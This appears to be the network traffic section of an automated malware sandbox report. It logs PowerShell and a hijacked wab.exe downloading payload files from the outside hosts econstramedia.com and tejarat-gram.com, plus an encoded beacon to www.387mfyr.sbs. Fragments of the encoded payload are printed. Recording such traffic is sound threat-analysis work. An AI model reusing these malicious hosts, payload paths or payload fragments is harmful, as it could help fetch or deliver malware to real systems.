                  Jul 11, 2024 13:12:53.254441977 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254517078 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254699945 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254786015 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254828930 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254899025 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.254930019 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.254997969 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.255276918 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.255341053 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.255373955 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.255445004 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.262458086 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.262542009 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.262671947 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.262739897 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.263421059 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.263494015 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.263705969 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.263767958 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.264334917 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.264436960 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.264492035 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.264554977 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.265338898 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.265403986 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.265491962 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.265758038 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.266235113 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.266310930 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.266511917 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.266587019 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267326117 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267393112 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267400980 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267430067 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.267462969 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.267486095 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268220901 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268306971 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268461943 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268536091 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268584967 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268647909 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268655062 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268697977 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.268744946 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:12:53.268802881 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.269279957 CEST49712443192.168.2.5185.83.114.124
                  Jul 11, 2024 13:12:53.269288063 CEST44349712185.83.114.124192.168.2.5
                  Jul 11, 2024 13:13:26.016989946 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.021913052 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.022097111 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.024619102 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.029428005 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862310886 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862325907 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862334013 CEST8049714137.220.252.40192.168.2.5
                  Jul 11, 2024 13:13:26.862510920 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.862510920 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.865869999 CEST4971480192.168.2.5137.220.252.40
                  Jul 11, 2024 13:13:26.870922089 CEST8049714137.220.252.40192.168.2.5

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jul 11, 2024 13:12:00.724746943 CEST5723653192.168.2.51.1.1.1
                  Jul 11, 2024 13:12:01.000530958 CEST53572361.1.1.1192.168.2.5
                  Jul 11, 2024 13:12:42.013803959 CEST5489853192.168.2.51.1.1.1
                  Jul 11, 2024 13:12:42.113394022 CEST53548981.1.1.1192.168.2.5
                  Jul 11, 2024 13:13:25.345397949 CEST5299553192.168.2.51.1.1.1
                  Jul 11, 2024 13:13:26.008534908 CEST53529951.1.1.1192.168.2.5

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jul 11, 2024 13:12:00.724746943 CEST192.168.2.51.1.1.10x5f64Standard query (0)econstramedia.comA (IP address)IN (0x0001)false
                  Jul 11, 2024 13:12:42.013803959 CEST192.168.2.51.1.1.10xa0e2Standard query (0)tejarat-gram.comA (IP address)IN (0x0001)false
                  Jul 11, 2024 13:13:25.345397949 CEST192.168.2.51.1.1.10x7773Standard query (0)www.387mfyr.sbsA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jul 11, 2024 13:12:01.000530958 CEST1.1.1.1192.168.2.50x5f64No error (0)econstramedia.com103.211.216.55A (IP address)IN (0x0001)false
                  Jul 11, 2024 13:12:42.113394022 CEST1.1.1.1192.168.2.50xa0e2No error (0)tejarat-gram.com185.83.114.124A (IP address)IN (0x0001)false
                  Jul 11, 2024 13:13:26.008534908 CEST1.1.1.1192.168.2.50x7773No error (0)www.387mfyr.sbs137.220.252.40A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • econstramedia.com
                  • tejarat-gram.com
                  • www.387mfyr.sbs

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549714137.220.252.40803228C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe
                  TimestampBytes transferredDirectionData
                  Jul 11, 2024 13:13:26.024619102 CEST456OUTGET /abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh HTTP/1.1
                  Host: www.387mfyr.sbs
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-us
                  Connection: close
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Jul 11, 2024 13:13:26.862310886 CEST691INHTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Thu, 11 Jul 2024 11:13:26 GMT
                  Content-Type: text/html
                  Content-Length: 548
                  Connection: close
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.549704103.211.216.554434324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-07-11 11:12:02 UTC178OUTGET /Teglbrnderier.snp HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: econstramedia.com
                  Connection: Keep-Alive
                  2024-07-11 11:12:02 UTC209INHTTP/1.1 200 OK
                  Date: Thu, 11 Jul 2024 11:12:02 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Tue, 09 Jul 2024 08:34:34 GMT
                  Accept-Ranges: bytes
                  Content-Length: 433500
                  2024-07-11 11:12:02 UTC7983INData Raw: 63 51 47 62 63 51 47 62 75 34 65 50 47 67 44 72 41 75 6f 71 36 77 4a 77 4b 41 4e 63 4a 41 54 72 41 6f 36 41 36 77 4c 54 34 62 6b 2b 46 47 49 67 63 51 47 62 36 77 4a 75 58 59 48 78 72 4b 41 72 5a 48 45 42 6d 33 45 42 6d 34 48 42 62 6b 75 32 75 33 45 42 6d 2b 73 43 70 33 68 78 41 5a 76 72 41 6b 2b 37 75 6c 4c 4f 57 2b 56 78 41 5a 76 72 41 75 31 2b 63 51 47 62 36 77 4b 75 57 6a 48 4b 36 77 49 62 71 65 73 43 34 50 43 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 69 39 4b 42 2b 54 6c 6a 62 67 4a 38 7a 4f 73 43 6b 53 35 78 41 5a 75 4c 52 43 51 45 36 77 49 33 76 65 73 43 71 4e 75 4a 77 2b 73 43 73 59 33 72 41 6b 52 52 67 63 50 68 30 57 51 42 63 51 47 62 36 77 4b 67 65 62 6f 71 66 35 34 68 36 77 49 70 44 65 73
                  Data Ascii: cQGbcQGbu4ePGgDrAuoq6wJwKANcJATrAo6A6wLT4bk+FGIgcQGb6wJuXYHxrKArZHEBm3EBm4HBbku2u3EBm+sCp3hxAZvrAk+7ulLOW+VxAZvrAu1+cQGb6wKuWjHK6wIbqesC4PCJFAtxAZtxAZvR4nEBm3EBm4PBBHEBm+sCi9KB+TljbgJ8zOsCkS5xAZuLRCQE6wI3vesCqNuJw+sCsY3rAkRRgcPh0WQBcQGb6wKgeboqf54h6wIpDes
                  2024-07-11 11:12:02 UTC8000INData Raw: 37 75 34 49 6a 35 77 49 51 55 76 6b 56 73 37 57 34 44 59 49 37 54 59 43 54 35 43 68 37 69 6a 46 78 39 35 35 55 76 70 49 54 66 69 58 68 41 6d 68 33 51 79 79 57 48 77 6e 46 4c 36 74 65 34 63 42 56 41 70 6d 67 71 63 34 46 6c 38 6d 33 51 44 58 62 4c 6c 50 73 4d 53 36 76 55 34 68 76 7a 63 4f 58 52 62 43 41 39 33 76 4e 7a 50 30 32 57 37 64 42 4a 6c 6c 51 54 4d 4d 36 5a 78 4b 4e 67 76 31 63 5a 72 31 74 45 57 59 76 39 66 45 56 79 6a 38 6f 58 2b 73 2b 63 2b 41 32 51 78 6c 54 70 75 54 41 67 77 73 43 56 53 4a 48 62 79 37 53 6a 49 57 42 2f 59 72 5a 57 54 35 6a 51 67 50 37 44 79 66 71 68 2b 36 64 6e 35 41 73 32 70 33 2b 42 72 73 35 38 77 38 48 57 74 6f 46 37 36 7a 4d 57 34 50 43 6b 6d 45 61 56 6d 62 78 47 43 78 66 6a 31 43 4b 35 36 42 43 42 47 62 78 6d 69 30 48 33 56
                  Data Ascii: 7u4Ij5wIQUvkVs7W4DYI7TYCT5Ch7ijFx955UvpITfiXhAmh3QyyWHwnFL6te4cBVApmgqc4Fl8m3QDXbLlPsMS6vU4hvzcOXRbCA93vNzP02W7dBJllQTMM6ZxKNgv1cZr1tEWYv9fEVyj8oX+s+c+A2QxlTpuTAgwsCVSJHby7SjIWB/YrZWT5jQgP7Dyfqh+6dn5As2p3+Brs58w8HWtoF76zMW4PCkmEaVmbxGCxfj1CK56BCBGbxmi0H3V
                  2024-07-11 11:12:02 UTC8000INData Raw: 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 57 77 41 41 4b 38 51 56 55 68 39 54 48 32 51 6f 46 50 65 4e 58 6b 46 41 30 2b 6d 74 70 37 31 7a 4e 70 73 75 5a 57 44 48 49 57 34 39 7a 73 53 30 75 43 64 54 42 51 4a 51 69 31 48 61 68 38 70 6d 77 42 46 32 72 45 2b 41 35 47 37 69 32 47 46 36 5a 65 69 35 6c 51 44 43 79 77 35 45 51 6e 62 72 54 79 67 6f 43 41 4a 63 35 39 47 41 4a 42 70 76 5a 45 58 37 50 34 4b 69 54 53 68 5a 66 79 70 75 34 38 2f 4d 56 4e 47 78 52 54 44 4c 48 42 6f 77 4d 4a 4a 43 7a 68 77 6d 75 63 42 61 64 45 75 2b 5a 65 69 69 76 49 70 73 30 65 59 44 30 58 66 6d 48 2f
                  Data Ascii: AWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAWwAAK8QVUh9TH2QoFPeNXkFA0+mtp71zNpsuZWDHIW49zsS0uCdTBQJQi1Hah8pmwBF2rE+A5G7i2GF6Zei5lQDCyw5EQnbrTygoCAJc59GAJBpvZEX7P4KiTShZfypu48/MVNGxRTDLHBowMJJCzhwmucBadEu+ZeiivIps0eYD0XfmH/
                  2024-07-11 11:12:02 UTC8000INData Raw: 34 39 46 57 6f 4d 50 58 77 6a 30 45 69 50 68 6e 51 58 64 30 2f 56 6f 35 70 66 59 56 4e 4b 68 7a 30 57 51 54 2f 63 72 34 30 69 4b 59 72 53 4b 44 66 78 41 59 38 31 57 36 32 5a 48 6e 6e 41 31 69 2b 73 56 46 72 4c 75 7a 2f 42 50 6b 6c 65 56 59 62 31 34 49 6a 6f 45 39 4b 75 2f 6b 56 6d 74 4e 75 69 34 72 62 32 75 7a 69 66 78 2f 55 50 5a 75 6c 49 6a 77 41 42 72 32 49 5a 4d 33 6d 41 39 45 65 36 4d 54 6a 65 4f 63 44 79 6d 6a 6d 4d 56 36 59 69 5a 4b 7a 34 37 66 58 79 79 56 4f 4e 77 5a 2f 35 74 41 4f 72 62 69 35 4e 4a 48 34 38 37 39 4e 57 4b 45 35 31 65 6b 42 30 52 42 55 4f 79 64 38 74 4c 69 64 41 62 35 37 55 4a 4d 48 4c 63 30 37 5a 73 41 48 59 35 65 6b 55 49 75 6c 5a 48 79 6b 73 5a 39 59 6e 75 34 64 54 45 41 6e 65 74 70 35 35 52 69 2f 34 73 7a 4d 66 64 54 6d 4e 33
                  Data Ascii: 49FWoMPXwj0EiPhnQXd0/Vo5pfYVNKhz0WQT/cr40iKYrSKDfxAY81W62ZHnnA1i+sVFrLuz/BPkleVYb14IjoE9Ku/kVmtNui4rb2uzifx/UPZulIjwABr2IZM3mA9Ee6MTjeOcDymjmMV6YiZKz47fXyyVONwZ/5tAOrbi5NJH4879NWKE51ekB0RBUOyd8tLidAb57UJMHLc07ZsAHY5ekUIulZHyksZ9Ynu4dTEAnetp55Ri/4szMfdTmN3
                  2024-07-11 11:12:02 UTC8000INData Raw: 4b 73 68 62 48 2b 32 62 78 53 37 2f 63 4e 56 43 4b 50 30 57 6e 6a 32 62 42 45 38 35 76 68 46 68 36 38 57 6d 6e 49 4c 41 61 47 4d 68 35 59 6f 69 52 4d 6b 64 54 78 64 6f 7a 67 73 79 5a 41 79 78 67 4a 48 46 54 46 50 37 44 4d 76 37 79 44 57 30 69 49 49 59 63 65 65 63 44 2b 65 41 31 34 34 66 47 6d 64 76 42 54 57 62 74 62 6e 42 31 39 56 43 4f 74 72 49 48 56 32 62 31 33 2f 42 50 45 6c 68 6d 49 50 32 6a 50 2b 63 4e 6b 6b 50 50 66 36 7a 57 64 63 34 76 51 4c 51 79 76 36 4e 79 63 54 46 37 30 75 63 62 48 44 39 54 38 65 76 6c 46 35 65 50 35 33 56 38 6f 35 47 54 6e 75 37 49 6c 6a 6b 4d 75 59 4a 6b 74 65 59 44 30 62 78 69 2b 4c 2f 35 59 73 37 51 65 4f 66 76 4f 76 33 4c 55 47 6f 61 56 63 51 4d 2b 51 78 57 42 62 77 6c 67 69 49 36 77 76 56 59 2b 53 54 77 43 6c 57 37 67 6a
                  Data Ascii: KshbH+2bxS7/cNVCKP0Wnj2bBE85vhFh68WmnILAaGMh5YoiRMkdTxdozgsyZAyxgJHFTFP7DMv7yDW0iIIYceecD+eA144fGmdvBTWbtbnB19VCOtrIHV2b13/BPElhmIP2jP+cNkkPPf6zWdc4vQLQyv6NycTF70ucbHD9T8evlF5eP53V8o5GTnu7IljkMuYJkteYD0bxi+L/5Ys7QeOfvOv3LUGoaVcQM+QxWBbwlgiI6wvVY+STwClW7gj
                  2024-07-11 11:12:03 UTC8000INData Raw: 31 32 6c 4a 6f 2f 52 55 32 67 50 6b 57 43 73 42 64 6a 6f 49 51 43 63 75 4d 41 66 6b 57 44 41 63 37 79 6f 49 67 69 6a 2f 67 39 43 39 37 69 6a 5a 78 36 4a 35 55 70 35 38 6d 65 4b 58 64 34 65 35 72 36 70 49 66 7a 66 39 79 74 49 56 64 61 71 38 30 32 79 4c 4d 35 53 34 48 6b 4d 54 58 4d 57 2b 48 67 68 61 4a 54 6d 30 48 66 72 76 78 66 34 66 50 4d 6a 4c 43 2f 44 78 63 56 5a 61 2b 56 57 2f 56 36 6d 30 39 2b 52 45 49 57 30 4f 4d 67 69 65 45 39 59 65 64 2b 51 6c 6a 30 56 6e 47 67 68 66 35 49 30 79 45 38 66 47 70 74 57 54 72 51 38 50 58 67 30 46 57 4a 50 74 61 63 52 47 32 34 38 54 6e 77 64 34 30 77 36 66 66 5a 35 48 2f 58 39 6d 66 68 35 72 66 70 75 56 6e 4e 45 59 4b 72 6d 55 39 78 46 30 35 73 75 77 48 30 62 51 50 56 53 2f 41 58 42 54 42 34 47 56 38 33 6a 77 2f 44 58
                  Data Ascii: 12lJo/RU2gPkWCsBdjoIQCcuMAfkWDAc7yoIgij/g9C97ijZx6J5Up58meKXd4e5r6pIfzf9ytIVdaq802yLM5S4HkMTXMW+HghaJTm0Hfrvxf4fPMjLC/DxcVZa+VW/V6m09+REIW0OMgieE9Yed+Qlj0VnGghf5I0yE8fGptWTrQ8PXg0FWJPtacRG248Tnwd40w6ffZ5H/X9mfh5rfpuVnNEYKrmU9xF05suwH0bQPVS/AXBTB4GV83jw/DX
                  2024-07-11 11:12:03 UTC8000INData Raw: 56 49 6d 62 56 36 46 51 37 42 66 30 30 58 46 57 69 76 6a 70 45 5a 2b 55 44 30 66 4e 79 48 4e 4e 34 35 77 78 56 78 75 51 44 30 53 39 59 6b 48 68 63 70 6f 49 2b 35 70 62 79 68 2f 6b 67 6e 4d 71 31 38 6f 72 47 57 6e 6a 75 36 79 62 4f 4a 55 51 42 6e 69 36 43 7a 76 54 45 67 70 56 70 2f 34 34 6f 58 7a 41 71 79 48 45 32 42 66 78 4f 31 2b 54 6e 58 78 71 54 38 66 39 6b 37 43 74 62 75 4d 75 41 6c 41 2b 43 67 77 31 49 62 75 46 77 4c 76 6a 6c 69 42 73 5a 39 6d 71 67 63 64 49 71 73 62 5a 35 67 78 2f 5a 36 2f 35 62 57 4b 6a 6d 79 78 30 69 4e 68 43 65 4a 51 6f 6e 7a 64 4a 5a 66 79 70 75 31 72 33 4c 35 58 6f 39 61 54 65 44 30 70 6e 78 55 6f 33 51 65 4f 65 39 4a 47 5a 34 68 56 43 4f 73 6c 4c 5a 71 53 74 35 51 50 39 70 6d 49 52 71 31 57 51 51 4e 2b 75 58 33 67 31 4e 57 54
                  Data Ascii: VImbV6FQ7Bf00XFWivjpEZ+UD0fNyHNN45wxVxuQD0S9YkHhcpoI+5pbyh/kgnMq18orGWnju6ybOJUQBni6CzvTEgpVp/44oXzAqyHE2BfxO1+TnXxqT8f9k7CtbuMuAlA+Cgw1IbuFwLvjliBsZ9mqgcdIqsbZ5gx/Z6/5bWKjmyx0iNhCeJQonzdJZfypu1r3L5Xo9aTeD0pnxUo3QeOe9JGZ4hVCOslLZqSt5QP9pmIRq1WQQN+uX3g1NWT
                  2024-07-11 11:12:03 UTC8000INData Raw: 4c 59 70 65 48 35 47 37 6c 30 48 35 36 68 77 41 4f 37 38 71 65 6a 75 71 2b 39 61 2f 4d 73 79 4e 6d 48 6d 53 57 55 54 4f 47 5a 44 6a 35 62 37 33 35 48 57 2b 32 77 5a 5a 64 55 41 57 62 33 35 68 34 35 77 78 65 73 42 50 38 4c 69 41 59 74 69 6c 34 35 77 4e 59 78 66 41 42 30 58 68 75 78 49 62 7a 57 68 54 54 65 4f 64 56 62 30 49 34 58 39 4c 35 43 59 4e 6b 6d 6a 4b 43 4a 34 68 75 73 49 54 35 43 55 6c 4f 73 5a 39 55 54 66 45 41 41 75 62 6c 59 38 43 6a 66 72 32 64 4d 38 31 6d 4d 6a 31 6a 61 75 6b 2b 51 54 52 63 36 61 47 35 36 2f 7a 69 35 41 4d 75 7a 52 38 44 30 58 67 50 47 45 39 37 35 38 39 36 66 39 6f 46 6d 57 33 78 6d 7a 4e 5a 2b 79 66 48 41 67 51 35 6d 59 50 35 2f 64 31 76 57 57 74 7a 42 38 68 4a 38 57 7a 4d 4f 4d 2b 33 69 50 65 6c 72 77 4f 37 4d 66 4e 69 2b 39
                  Data Ascii: LYpeH5G7l0H56hwAO78qejuq+9a/MsyNmHmSWUTOGZDj5b735HW+2wZZdUAWb35h45wxesBP8LiAYtil45wNYxfAB0XhuxIbzWhTTeOdVb0I4X9L5CYNkmjKCJ4husIT5CUlOsZ9UTfEAAublY8Cjfr2dM81mMj1jauk+QTRc6aG56/zi5AMuzR8D0XgPGE975896f9oFmW3xmzNZ+yfHAgQ5mYP5/d1vWWtzB8hJ8WzMOM+3iPelrwO7MfNi+9
                  2024-07-11 11:12:03 UTC8000INData Raw: 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 41 42 62 41 49 4d 76 6a 43 41 41 63 46 4e 54 58 6e 6a 66 6d 2b 33 58 2f 43 32 43 34 6c 69 62 39 61 37 35 31 41 4b 56 44 6d 43 43 30 70 4d 73 4a 4a 6e 78 57 71 37 51 65 4f 64 6c 56 4c 70 59 67 33 43 56 31 49 49 71 32 34 66 6b 79 66 77 2f 67 6a 36 47 34 59 7a 6e 2b 52 41 48 72 50 71 64 67 69 62 36 41 4e 39 57 48 74 37 54 56 5a 53 42 4f 67 74 35 48 49 68 73 31 65 59 44 30 66 77 43 78 4e
                  Data Ascii: bAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAABbAIMvjCAAcFNTXnjfm+3X/C2C4lib9a751AKVDmCC0pMsJJnxWq7QeOdlVLpYg3CV1IIq24fkyfw/gj6G4Yzn+RAHrPqdgib6AN9WHt7TVZSBOgt5HIhs1eYD0fwCxN
                  2024-07-11 11:12:03 UTC8000INData Raw: 4f 49 4d 74 51 53 41 4a 79 51 50 52 6d 41 2f 7a 36 6a 54 71 33 51 53 53 43 34 52 76 36 53 4d 61 2f 59 69 2f 54 65 4f 63 69 35 44 33 30 67 6c 52 55 35 51 50 52 58 35 32 62 4f 68 37 65 79 56 44 4e 79 77 48 52 65 4e 39 46 6c 41 57 42 68 68 6e 35 59 69 2f 54 65 4f 65 51 78 78 2b 62 56 47 34 39 67 4a 53 47 2b 52 6a 2f 30 58 6a 6e 44 46 56 67 51 67 44 52 4a 36 66 38 58 46 54 6c 41 39 45 4e 41 30 4d 57 65 45 73 4f 70 68 6c 6d 4b 78 58 42 78 68 74 51 53 43 66 79 34 6c 6c 6d 41 79 59 79 57 63 48 6f 73 4f 4b 42 44 4c 76 75 4c 71 2b 6c 4a 41 72 6f 6f 69 41 44 52 71 54 79 35 6c 53 67 5a 6a 4f 6e 68 32 32 71 55 59 4a 6e 67 75 47 6e 54 6d 39 51 2b 63 38 4f 2b 36 49 78 5a 56 43 43 35 4f 63 57 2f 51 51 43 30 58 68 68 51 2b 68 48 5a 71 34 79 65 65 63 44 35 58 2f 61 4c 72
                  Data Ascii: OIMtQSAJyQPRmA/z6jTq3QSSC4Rv6SMa/Yi/TeOci5D30glRU5QPRX52bOh7eyVDNywHReN9FlAWBhhn5Yi/TeOeQxx+bVG49gJSG+Rj/0XjnDFVgQgDRJ6f8XFTlA9ENA0MWeEsOphlmKxXBxhtQSCfy4llmAyYyWcHosOKBDLvuLq+lJArooiADRqTy5lSgZjOnh22qUYJnguGnTm9Q+c8O+6IxZVCC5OcW/QQC0XhhQ+hHZq4yeecD5X/aLr


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.549712185.83.114.1244434820C:\Program Files (x86)\Windows Mail\wab.exe
                  TimestampBytes transferredDirectionData
                  2024-07-11 11:12:52 UTC184OUTGET /cyoeNvCnByBgIccf106.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: tejarat-gram.com
                  Cache-Control: no-cache
                  2024-07-11 11:12:52 UTC241INHTTP/1.1 200 OK
                  Date: Thu, 11 Jul 2024 11:12:52 GMT
                  Server: Apache
                  Last-Modified: Tue, 09 Jul 2024 08:27:41 GMT
                  Accept-Ranges: bytes
                  Content-Length: 269888
                  Vary: User-Agent
                  Connection: close
                  Content-Type: application/octet-stream
